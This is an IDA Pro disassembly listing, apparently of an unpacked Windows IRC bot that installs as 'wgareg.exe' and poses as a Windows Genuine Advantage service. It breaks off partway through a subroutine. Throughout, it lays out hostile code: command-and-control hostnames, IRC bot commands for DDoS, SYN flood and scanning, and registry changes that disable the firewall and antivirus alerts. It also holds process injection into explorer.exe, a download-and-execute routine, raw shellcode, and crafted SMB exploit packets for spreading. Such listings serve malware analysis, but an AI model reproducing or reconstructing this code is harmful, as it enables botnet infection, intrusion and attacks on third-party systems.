;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 28C8DADABF9911B53B8E186A6EAAA4CC
; File Name : u:\work\28c8dadabf9911b53b8e186a6eaaa4cc_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
MEW segment para public 'BSS' use32
assume cs:MEW
;org 401000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_401000 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_401004 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_4027AF+24�r ...
dword_401008 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_4027AF+E�r ...
dword_40100C dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4027AF+42�r ...
dword_401010 dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_401014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_401018 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_40101C dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_401020 dd 77DEB635h ; resolved to->ADVAPI32.ControlServicedword_401024 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4034DF+E7�r ...
dword_401028 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_4026D6+C4�r
dword_40102C dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_4034DF+C3�r ...
dword_401030 dd 77DFD5BBh ; resolved to->ADVAPI32.RegCreateKeyA ; sub_4034DF+A8�r ...
dword_401034 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_401038 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40103C dd 77E37071h ; resolved to->ADVAPI32.CreateServiceA dd 0
dword_401044 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_4037DC+6�r
dword_401048 dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThreaddword_40104C dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; sub_4037DC+D4�r
dword_401050 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_401054 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_401058 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_40105C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_405BB6+82�r
dword_401060 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_401064 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_404CE7+B3�r
dword_401068 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_404CE7+93�r
dword_40106C dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; MEW:00403B81�r ...
dword_401070 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_401074 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_401078 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsAdword_40107C dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_401080 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_401084 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_401088 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_40108C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_401090 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_401094 dd 7C8608FFh ; resolved to->KERNEL32.GetTempFileNameAdword_401098 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_40109C dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_4010A0 dd 7C834E64h ; resolved to->KERNEL32._lclosedword_4010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; MEW:00403AAC�r ...
dword_4010A8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_4037DC+54�r ...
dword_4010AC dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_402C9E+C3�r ...
dword_4010B0 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4010B4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_403A51+25�r ...
dword_4010B8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4010BC dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_4028D3+10E�r ...
dword_4010C0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4010C4 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_4034DF+286�r
dword_4010C8 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4010D0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_4010D4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_40284B+29�r ...
dword_4010D8 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_4010DC dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_402650+6E�r ...
dd 0
dword_4010E4 dd 71A6EA82h dd 0
dword_4010EC dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_4010F0 dd 7E418D2Bh ; resolved to->USER32.CharUpperA ; sub_403E5B+A0�r
dword_4010F4 dd 7E43210Ah ; resolved to->USER32.FindWindowExA ; sub_40553F+84�r ...
dword_4010F8 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId ; sub_40553F+6D�r
dword_4010FC dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_40553F+CA�r ...
dword_401100 dd 7E43147Ah ; resolved to->USER32.GetMenudword_401104 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_4028D3+123�r ...
dd 0
dword_40110C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; MEW:0040464C�r ...
dword_401110 dd 71AB2C69h ; resolved to->WS2_32.sendto ; MEW:0040474F�r ...
dword_401114 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; MEW:00404A77�r ...
dword_401118 dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_40111C dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_40414F+10D�r ...
dword_401120 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_402C9E+2E8�r
dword_401124 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_40414F+1A6�r
dword_401128 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; MEW:0040452C�r
dword_40112C dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_403B95+1D2�r ...
dword_401130 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4028D3+144�r ...
dword_401134 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; MEW:00404577�r ...
dword_401138 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_403B95+1FE�r
dword_40113C dd 71AB615Ah ; resolved to->WS2_32.recv ; MEW:004049F2�r ...
dword_401140 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_403062+167�r ...
dword_401144 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_401148 dd 71AB3E00h ; resolved to->WS2_32.bind ; MEW:0040496B�r
dword_40114C dd 71AB88D3h ; resolved to->WS2_32.listendword_401150 dd 71AC1028h ; resolved to->WS2_32.acceptdword_401154 dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_401158 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_403B95+2A2�r
dword_40115C dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_401160 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_403B95+60�r ...
dword_401164 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_403062+3A3�r ...
dd 6 dup(0)
aCWindowsSystem db 'C:\WINDOWS\system32\wgareg.exe',0 ; DATA XREF: sub_402650+9�o
; sub_402650+19�o ...
align 10h
dd 3Ah dup(0)
dword_401288 dd 0 ; sub_402C9E+28E�r ...
dword_40128C dd 0 ; sub_4028D3+6F�r ...
dword_401290 dd 0 ; sub_4028D3+1A�w ...
word_401294 dw 0 ; DATA XREF: sub_4028D3+2A�w
; sub_4028D3+42�w ...
align 4
dword_401298 dd 80h dup(0) ; sub_4028D3+139�o ...
dword_401498 dd 4 dup(0) ; sub_402C9E+189�o ...
dword_4014A8 dd 8 dup(0) ; sub_4028D3+114�o ...
dword_4014C8 dd 0 ; sub_4028D3+133�r ...
dword_4014CC dd 0 ; sub_4044C0+3�w ...
dword_4014D0 dd 0 ; MEW:004051C7�w ...
dword_4014D4 dd 0 ; sub_403062+383�r
dword_4014D8 dd 0 ; sub_402C9E+2DC�r ...
dword_4014DC dd 0 ; sub_4028D3+C7�r ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402650+58�o
; sub_4027FE+9�o ...
align 4
dd 3Dh dup(0)
aD: ; DATA XREF: sub_403062+3DF�o
; sub_4037DC+37�o ...
unicode 0, <d>,0
unicode 0, <h>,0
db '¼',7,0
align 4
dd 6F8h
dword_401600 dd 44h ; sub_4027FE+2F�w ...
dd 0Ah dup(0)
dword_40162C dd 81h word_401630 dw 0 ; DATA XREF: sub_4027FE+43�w
align 4
dd 4 dup(0)
dword_401644 dd 0FF682DEBh, 68FFFFFFhdword_40164C dd 4 db 0B8h
dword_401651 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObject db 0FFh, 0D0h, 68h
dword_401658 dd 4 db 0B8h
dword_40165D dd 7C809B47h ; resolved to->KERNEL32.CloseHandle db 0FFh, 0D0h, 0B8h
dword_401664 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA dd 6AD0FFh
db 0B8h
dword_40166D dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess db 0FFh, 0D0h, 0E8h
dd 0FFFFFFCEh, 0
dword_40167C dd 1 ; sub_403062+335�w ...
dword_401680 dd 1 ; sub_403A51+C�w ...
dd 1
dword_401688 dd 1 ; sub_4048CF+C�w ...
dword_40168C dd 1 ; sub_404F02+87�w ...
dword_401690 dd 401180BAh, 510B900h, 0FE80000h, 0BA000000h, 4016B7h
; DATA XREF: sub_4025E7+4�o
dd 45A5B9h, 259C6800h, 32800040h, 0FAE242B0h, 8C2h
dword_4016B8 dd 32312E25h, 255C7338h, 7334362Eh, 0aBniu_househot_ db 'bniu.househot.com',0 ; DATA XREF: sub_4028D3+E�o
; sub_4028D3:loc_402905�o
byte_4016DA db 2Eh ; DATA XREF: sub_402C9E+12C�r
; sub_402C9E+23D�r
byte_4016DB db 21h ; DATA XREF: sub_402C9E+14B�r
; sub_402C9E+25C�r
word_4016DC dw 9346h ; DATA XREF: sub_4028D3+3C�r
align 10h
aYpgw_wallloan_ db 'ypgw.wallloan.com',0 ; DATA XREF: sub_4028D3+1A�o
align 4
word_4016F4 dw 9346h ; DATA XREF: sub_4028D3+24�r
align 4
dword_4016F8 dd 316E23h ; sub_402C9E+38A�o ...
aNert4mp1 db 'nert4mp1',0 ; DATA XREF: sub_402C9E+385�o
align 4
dword_401708 dd 12Ch dword_40170C dd 2D316Eh dword_401710 dd 6461212Ah, 406E696Dh, 696D6461h, 6EhaWgareg_0 db 'wgareg',0 ; DATA XREF: sub_4025F4+9�o
align 4
aWgareg_exe db 'wgareg.exe',0 ; DATA XREF: sub_402650+14�o
align 4
aWgareg db 'wgareg',0 ; DATA XREF: MEW:004025BA�o
; sub_4026D6+1A�o ...
align 4
aWindowsGenuine db 'Windows Genuine Advantage Registration Service',0
; DATA XREF: sub_4026D6+52�o
align 10h
aEnsuresThatYou db 'Ensures that your copy of Microsoft Windows is genuine and regist'
; DATA XREF: sub_4026D6+A0�o
db 'ered. Stopping or disabling this service will result in system in'
db 'stability.',0
align 10h
aNick_24s db 'NiCK %.24s',0Ah,0 ; DATA XREF: sub_4028D3+119�o
; sub_402C9E+19E�o
aUserLLLL db 'USeR l l l l',0Ah,0 ; DATA XREF: sub_4028D3+EC�o
align 4
aPrivmsg_16s_48 db 'PRiVMSG %.16s :%.480s',0Ah,0 ; DATA XREF: sub_402C53+11�o
align 4
aJoin_16s_16s db 'JOiN %.16s %.16s',0Ah,0 ; DATA XREF: sub_402C9E+38F�o
align 4
aUserhost_16s db 'USeRHOST %.16s',0Ah,0 ; DATA XREF: sub_402C9E+354�o
a001 db '001',0 ; DATA XREF: sub_402C9E:loc_402FC4�o
a302 db '302',0 ; DATA XREF: sub_402C9E:loc_402F16�o
a332 db '332',0 ; DATA XREF: sub_402C9E:loc_402E72�o
a433 db '433',0 ; DATA XREF: sub_402C9E:loc_402E05�o
; sub_405394:loc_40544E�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_402C9E:loc_402D59�o
aPong_500s_0 db 'PoNG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_402C9E+85�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_402C9E+70�o
; sub_405394+6A�o
align 4
aExec db '[exec] :(',0 ; DATA XREF: sub_403062:loc_403476�o
align 4
aExec_0 db '[exec] :)',0 ; DATA XREF: sub_403062+408�o
align 10h
aNi_16s_16s db '[ni] %.16s %.16s',0 ; DATA XREF: sub_403062+3B1�o
align 4
a_500s db '%.500s',0Ah,0 ; DATA XREF: sub_403062+25E�o
; sub_404FCE+17�o
aQuit db 'QUiT',0Ah,0 ; DATA XREF: sub_403062+150�o
align 4
a_8s08x db '%.8s%08x',0 ; DATA XREF: sub_4034BB+F�o
align 10h
aSharedaccess db 'sharedaccess',0 ; DATA XREF: sub_4034DF+29D�o
align 10h
aSDebugDcpromo_ db '%s\debug\dcpromo.log',0 ; DATA XREF: sub_4034DF+252�o
align 4
aSoftwarePoli_0 db 'software\policies\microsoft\windowsfirewall\standardprofile',0
; DATA XREF: sub_4034DF+205�o
aEnablefirewall db 'enablefirewall',0 ; DATA XREF: sub_4034DF+1EA�o
; sub_4034DF+222�o
align 4
aSoftwarePolici db 'software\policies\microsoft\windowsfirewall\domainprofile',0
; DATA XREF: sub_4034DF+1CD�o
align 10h
aFirewalldisa_0 db 'firewalldisableoverride',0 ; DATA XREF: sub_4034DF+1B2�o
aFirewalldisabl db 'firewalldisablenotify',0 ; DATA XREF: sub_4034DF+197�o
align 10h
aAntivirusoverr db 'antivirusoverride',0 ; DATA XREF: sub_4034DF+17C�o
align 4
aAntivirusdisab db 'antivirusdisablenotify',0 ; DATA XREF: sub_4034DF+161�o
align 4
aSoftwareMicr_0 db 'software\microsoft\security center',0 ; DATA XREF: sub_4034DF+144�o
align 10h
aAutosharewks db 'autosharewks',0 ; DATA XREF: sub_4034DF+129�o
align 10h
aAutoshareserve db 'autoshareserver',0 ; DATA XREF: sub_4034DF+10E�o
aSystemCurren_0 db 'system\currentcontrolset\services\lanmanserver\parameters',0
; DATA XREF: sub_4034DF+F1�o
align 4
aRestrictanon_0 db 'restrictanonymoussam',0 ; DATA XREF: sub_4034DF+D6�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_4034DF+BB�o
align 4
aSystemCurrentc db 'system\currentcontrolset\control\lsa',0 ; DATA XREF: sub_4034DF+9E�o
align 10h
aEnabledcom db 'enabledcom',0 ; DATA XREF: sub_4034DF+83�o
align 4
aSoftwareMicros db 'software\microsoft\ole',0 ; DATA XREF: sub_4034DF+6A�o
align 4
aN: ; DATA XREF: sub_4034DF+9�o
unicode 0, <n>,0
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4037DC+4D�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_403A18+1D�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_403A18+9�o
align 4
aFindfile_256s_ db '[findfile] %.256s%.240s',0 ; DATA XREF: sub_404033+D0�o
a_256s_250s db '%.256s%.250s\',0 ; DATA XREF: sub_404033+8C�o
align 4
a__ db '..',0 ; DATA XREF: sub_404033+6A�o
align 4
a_: ; DATA XREF: sub_404033+54�o
; sub_404CE7+45�o
unicode 0, <.>,0
a_256s db '%.256s*',0 ; DATA XREF: sub_404033+C�o
aComspecQ db '"%comspec%" /Q',0 ; DATA XREF: sub_40414F+221�o
align 4
aSyn_16sDoneUms db '[syn:%.16s] done [%ums] [%u packets] [%uMB] [%uK/s]',0
; DATA XREF: MEW:0040483F�o
dbl_401B88 dq 1.0e3 ; DATA XREF: MEW:00404816�r
a_16sHu_16sHu_2 db '[%.16s:%hu->%.16s:%hu] "%.256s"',0 ; DATA XREF: MEW:00404C1C�o
aJoin db 'JOIN #* *',0 ; DATA XREF: sub_404C51+53�o
align 4
aOper?? db 'OPER ?* ?* *',0 ; DATA XREF: sub_404C51+4C�o
align 4
aPass? db 'PASS ?* ',0 ; DATA XREF: sub_404C51+45�o
align 4
aUser? db 'USER ?* ',0 ; DATA XREF: sub_404C51+3E�o
align 4
a?Ddos db '* :?*ddos* *',0 ; DATA XREF: sub_404C51+37�o
align 4
a?Udp db '* :?*udp* *',0 ; DATA XREF: sub_404C51+30�o
a?Syn db '* :?*syn* *',0 ; DATA XREF: sub_404C51+29�o
a?Scan db '* :?*scan* *',0 ; DATA XREF: sub_404C51+22�o
align 4
a?set db '* :?set * * *',0 ; DATA XREF: sub_404C51+1B�o
align 4
a?login db '* :?login * *',0 ; DATA XREF: sub_404C51+14�o
align 4
aPrivmsg? db '*PRIVMSG * :?* *',0 ; DATA XREF: sub_404C51+D�o
align 10h
a_332? db '*:*.* 332 * #* :?* *',0 ; DATA XREF: sub_404C51+6�o
byte_401C65 db 3 dup(0) ; DATA XREF: sub_404CE7+40�o
aDl08xDl db '[dl:%08x] :( dl',0 ; DATA XREF: sub_404CE7+1F4�o
aDl08xExec db '[dl:%08x] :( exec',0 ; DATA XREF: sub_404CE7+1C5�o
align 4
aDl08x db '[dl:%08x] :)',0 ; DATA XREF: sub_404CE7+188�o
align 4
aDl08x_180sTo_1 db '[dl:%08x] %.180s to %.180s',0 ; DATA XREF: sub_404CE7+10F�o
align 4
aUrldownloadtof db 'URLDownloadToFileA',0 ; DATA XREF: sub_404CE7+A8�o
align 4
aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: sub_404CE7+8E�o
align 4
aNick_16s db 'NICK %.16s',0Ah,0 ; DATA XREF: MEW:00405272�o
; sub_405394+171�o
aUser_16s_16s_1 db 'USER %.16s "" "%.16s" %.16s',0Ah,0 ; DATA XREF: MEW:00405235�o
align 4
aPong_500s db 'PONG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_405394+7F�o
align 4
a_oscar_tree db '_Oscar_Tree',0 ; DATA XREF: sub_40553F+9A�o
a32770 db '#32770',0 ; DATA XREF: sub_40553F+4A�o
; sub_40553F+7A�o
align 4
a_oscar_statusn db '_Oscar_StatusNotify',0 ; DATA XREF: sub_40553F+8�o
a_oscar_iconbtn db '_Oscar_IconBtn',0 ; DATA XREF: sub_405728+8A�o
align 4
aAte32class db 'Ate32Class',0 ; DATA XREF: sub_405728+5F�o
align 4
aCbclass db 'CBClass',0 ; DATA XREF: sub_405728+49�o
aWndate32class db 'WndAte32Class',0 ; DATA XREF: sub_405728+2D�o
align 10h
aAim_imessage db 'AIM_IMessage',0 ; DATA XREF: sub_405728+B�o
align 10h
aInstantMessage db 'Instant Message',0 ; DATA XREF: sub_405728:loc_40572E�o
dword_401D90 dd 0EFFFC481h, 0EB44FFFFh, 0E86BEB02h, 0FFFFFFF9h, 57565553h
; DATA XREF: sub_405AE6+61�o
dd 18246C8Bh, 8B3C458Bh, 3780554h, 184A8BD5h, 3205A8Bh
dd 4932E3DDh, 38B348Bh, 0FCFF33F5h, 3AACC033h, 0C10774C4h
dd 0F8030DCFh, 7C3BF2EBh, 0E1751424h, 3245A8Bh, 0C8B66DDh
dd 1C5A8B4Bh, 48BDD03h, 0EBC5038Bh, 5FC03302h, 895B5D5Eh
dd 8B042444h, 44892404h, 448B0824h, 0C4830424h, 6A5EC308h
dd 8B645930h, 0C5B8B19h, 8B1C5B8Bh, 87B8B1Bh, 8B1CEC83h
dd 50C033ECh, 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah
dd 75FF066Ah, 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh
dd 8E68570Ch, 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h
dd 73776864h, 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h
dd 68531045h, 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh
dd 6A066AD6h, 0FF026A01h, 84589D0h, 5050C033h, 0FF02B850h
dd 0F4800427h, 0C48B50FFh, 0FF50106Ah, 68530875h, 0C7701AA4h
dd 0D0FFD6FFh, 0A4685358h, 0FFE92EADh, 0FF106AD6h, 0D0FF0875h
dd 5050C033h, 530875FFh, 8649E568h, 0FFD6FF49h, 84D8BD0h
dd 51084589h, 811855FFh, 0FFFEFCC4h, 33DC8BFFh, 0FFB151C9h
dd 75FF5351h, 1055FF08h, 0A7EC085h, 75FF5350h, 0C55FF04h
dd 75FFE5EBh, 1855FF08h, 4C5B6857h, 0D6FFDD1Ah, 0FF0475FFh
dd 50C033D0h, 571475FFh, 8AFE9868h, 0FFD6FF0Eh, 0EF6857D0h
dd 0FF60E0CEh, 0D0FFD6h
dword_401F28 dd 197h ; sub_405AE6+4C�r ...
dword_401F2C dd 182h ; sub_4059EF+50�r ...
dword_401F30 dd 0EFFFC481h, 8B44FFFFh, 0EB02EBECh, 0FFF9E86Bh, 5553FFFFh
; DATA XREF: sub_4059EF+2E�o
dd 6C8B5756h, 458B1824h, 5548B3Ch, 8BD50378h, 5A8B184Ah
dd 0E3DD0320h, 348B4932h, 33F5038Bh, 0C033FCFFh, 74C43AACh
dd 0DCFC107h, 0F2EBF803h, 14247C3Bh, 5A8BE175h, 66DD0324h
dd 8B4B0C8Bh, 0DD031C5Ah, 38B048Bh, 3302EBC5h, 5D5E5FC0h
dd 2444895Bh, 24048B04h, 8244489h, 424448Bh, 0C308C483h
dd 364C033h, 408B3040h, 1C708B0Ch, 8788BADh, 50C0335Eh
dd 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah, 75FF066Ah
dd 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh, 8E68570Ch
dd 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h, 73776864h
dd 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h, 68531045h
dd 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh, 6A066AD6h
dd 0FF026A01h, 4589D0h, 5050C033h, 0FF02B850h, 0F4800427h
dd 0C48B50FFh, 0FF50106Ah, 68530075h, 0C7701AA4h, 0D0FFD6FFh
dd 0A4685350h, 0FFE92EADh, 75FFD6h, 5050D0FFh, 530075FFh
dd 8649E568h, 0FFD6FF49h, 4589D0h, 0FEFCC481h, 0DC8BFFFFh
dd 0B151C933h, 0FF5351FFh, 55FF0075h, 7EC08510h, 0FF53500Ah
dd 55FF0475h, 57E5EB0Ch, 1A4C5B68h, 0FFD6FFDDh, 0D0FF0475h
dd 0FF50C033h, 68571475h, 0E8AFE98h, 0D0FFD6FFh, 0CEEF6857h
dd 0D6FF60E0h, 0D0FFh, 0
dword_4020B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40587E+3B�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_402148 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+4D�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_4021F8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+5F�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_4022D8 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_40587E+9E�o
dd 0AB80000h, 46300800h, 0FF04h, 1000000h, 0F00h, 495C5C5Ch
dd 244350h, 3F3F3F3Fh, 3Fh
dword_402318 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_40587E+AD�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 2 dup(0)
dword_402380 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+BF�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_402428 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0) dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_4024B0 dd 0 dd 0D7h, 1, 0
dd 1, 0
dd 0CBh, 3 dup(0)
dword_4024D8 dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_405AE6+E�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_402560 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_402584 dd 205D655Bh, 36312E25h, 2E252073h, 7332hdword_402594 dd 6B32h dword_402598 dd 7078h ; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
and dword ptr [ebp-10h], 0
mov dword ptr [ebp-0Ch], offset loc_40288B
and dword ptr [ebp-8], 0
and dword ptr [ebp-4], 0
call sub_40284B
mov dword ptr [ebp-10h], offset aWgareg ; "wgareg"
call sub_4027FE
lea eax, [ebp-10h]
push eax
call dword_401000 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_4025D9
call sub_402650
loc_4025D9: ; CODE XREF: MEW:004025D2�j
call sub_4025F4
; ---------------------------------------------------------------------------
dw 4E8h
dd 33000000h
db 0C0h, 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025E7 proc near
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], offset dword_401690
leave
retn
sub_4025E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4025F4 proc near ; CODE XREF: MEW:loc_4025D9�p
; MEW:004028C3�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
push offset aWgareg_0 ; "wgareg"
push 0
push 0
call dword_4010CC ; CreateMutexA
test eax, eax
jz short loc_40261D
